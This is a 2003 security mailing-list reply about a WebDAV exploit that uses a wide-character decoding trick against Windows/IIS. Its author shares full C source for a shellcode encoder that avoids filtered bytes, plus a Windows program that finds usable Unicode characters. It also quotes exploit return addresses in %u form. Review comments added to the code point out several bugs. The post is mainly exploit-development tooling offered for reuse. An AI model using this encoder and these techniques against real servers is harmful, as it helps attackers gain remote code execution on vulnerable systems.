Re: WebDAV exploit: using wide character decoder scheme Mar 27 2003 01:47AM
JW Oh (mat monkey org)
In-Reply-To: <20030326111443.6fb287a3.dave (at) immunitysec (dot) com [email concealed]>

>

>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),

>those %u directives get translated into question marks. (0x003F in hex)

>:<

I tested it only on the Korean version of Windows (Server and Professional editions).

>

>This exploit must be much easier to get reliable on other language

>versions. A shame, really.

Shame???

>

>Did you use my encoder or did you write your shellcode manually, just

>out of curiosity?

The encoding scheme is very simple.

This is the shellcode encoder.

---------------------------------

/*

mat (at) monkey (dot) org [email concealed]

mat (at) panicsecurity (dot) org [email concealed]

Shellcode encoder for webdav exploit.

*/

#include <stdio.h>

/*
 * Returns 1 when the byte value num1 is one of the characters this encoder
 * refuses to emit (the set is spelled out by the case labels below), else 0.
 */
int is_special(unsigned char num1)
{
    switch (num1) {
    case 0x3a: case 0x26: case 0x3f: case 0x25:
    case 0x23: case 0x20: case 0x0a: case 0x0d:
    case 0x2f: case 0x2b: case 0x0b: case 0x5c:
        return 1;
    default:
        return 0;
    }
}

/*
 * Encoder entry point: reads raw bytes from stdin in chunks of up to 512
 * bytes and prints, for each input byte, an escaped representation made of
 * two "halves" that add up to the original byte and that both avoid the
 * byte values rejected by is_special().
 *
 * NOTE(review): `void main()` is not a conforming signature, and read() is
 * used without <unistd.h>; this builds only on lenient older toolchains.
 */
void main()
{
    int debug=0;                /* non-zero interleaves "<hex>(<dec>): " diagnostics into the output */
    int rc;
    unsigned char buffer[512];
    /* Loops until read() returns 0 (EOF).  A -1 return (error) is also
       non-zero, so on a read error the loop keeps spinning instead of
       stopping; the for loop below then runs zero times because rc < 0. */
    while(rc=read(0,buffer,sizeof(buffer)))
    {
        int i;
        for(i=0;i<rc;i++)
        {
            /* Split the byte in two: num1 = floor(b/2), num2 = ceil(b/2),
               so num1 + num2 == buffer[i].  The & 0xff is a no-op here,
               since buffer[i]/2 is at most 127. */
            unsigned int num1=(buffer[i]/2)&0xff;
            unsigned int num2=(buffer[i]/2)&0xff;
            if(buffer[i]%2==1)
            {
                num2++;
            }
            /* Move weight from num2 to num1 until neither half is a
               rejected byte; each ++/-- pair preserves the sum.  Both
               values are truncated to unsigned char at the call. */
            while(is_special(num1) || is_special(num2))
            {
                num1++;
                num2--;
                /* Diagnostic only: nothing stops the loop here, and num2
                   is unsigned, so a further decrement would wrap. */
                if(num2==0)
                {
                    printf("error!\n");
                }
            }
            /* NOTE(review): buffer[i] is unsigned char (promoted to a value
               in 0..255), so the comparison with -1 is never true and this
               branch is unreachable as written. */
            if(buffer[i]==-1)//0xff)
            {
                num2=0x2a;
                if(debug)
                {
                    printf("\n%.2x(%4d): ",buffer[i]&0xff,buffer[i]);
                }
                /* Literal "%u11d5" followed by one \x escape; the meaning of
                   the %u constant is not explained in this listing. */
                printf("%%u11d5\\x%.2x",num2);
            }else if(buffer[i]==1)
            {
                /* Byte 0x01 gets a fixed literal pair; the choice of these
                   constants is likewise not documented here. */
                printf("%%u0411%%u00f0");
            }else{
                if(debug)
                {
                    printf("\n%.2x(%4d): ",buffer[i]&0xff,buffer[i]);
                }
                /* Usual case: two \x escapes whose values add up to the
                   original byte (the receiving side is presumably expected
                   to recombine them; that side is not shown here). */
                printf("\\x%.2x\\x%.2x",num1,num2);
            }
        }
    }
}

---------------------------------

And this is the code for finding valid Unicode characters on my system.

---------------------------------

#include <windows.h>

#include <lm.h>

#include <stdio.h>

/*
 * Probe: for every byte pair (i, j) in 0..254 x 0..254, builds one wide
 * character from the two raw bytes and asks WideCharToMultiByte() to convert
 * it under the system ANSI code page (CP_ACP).  Pairs for which no default
 * substitution character was needed are printed as "jjii" in hex.
 *
 * NOTE(review): <lm.h> is included but nothing from it is used in this
 * listing; argc/argv are unused as well.
 */
int main(int argc, char* argv[])
{
    unsigned char i;
    unsigned char j;
    /* Bounds are < 255, so 0xff is never tried on either axis (an inclusive
       bound would not terminate with an unsigned char counter). */
    for(i=0;i<255;i++)
    {
        for(j=0;j<255;j++)
        {
            char string_to_copy[3];
            WCHAR src[256]={0,};
            char dest[256]={0,};
            string_to_copy[0]=i;
            string_to_copy[1]=j;
            string_to_copy[2]=0;
            /* Copies raw bytes, not characters: strlen() stops at the first
               NUL, so when i == 0 nothing is copied and when j == 0 only one
               byte is.  On a little-endian build the first WCHAR is then
               (j << 8) | i, which is why the output below prints j before i. */
            memcpy(src,string_to_copy,strlen(string_to_copy));
            /* NOTE(review): not a pointer despite the "lp" prefix, and left
               uninitialized; the call's return value is not checked, so if
               the conversion fails the flag read below is indeterminate. */
            BOOL lpUsedDefaultChar;
            /* Converts exactly one wide character (cchWideChar = 1) into
               dest; dest itself is never inspected, only the flag. */
            WideCharToMultiByte
            (CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar);
            if(!lpUsedDefaultChar)
            {
                printf("%.2x%.2x\n",j,i);
            }
        }
    }
    return 0;
}

---------------------------------

>

>Dave Aitel

>Advanced Engineering Directorate

>Immunity, Inc.

>http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the

>movies."

>

>On Wed, 26 Mar 2003 22:55:12 +0900

>¿ÀÁ¤¿í <mat (at) panicsecurity (dot) org [email concealed]> wrote:

>> my @return_addresses=(

>> "%u32ac%u77e2",

>> "%uc1b5%u76ae",

>> "%u005d%u77a5",

>
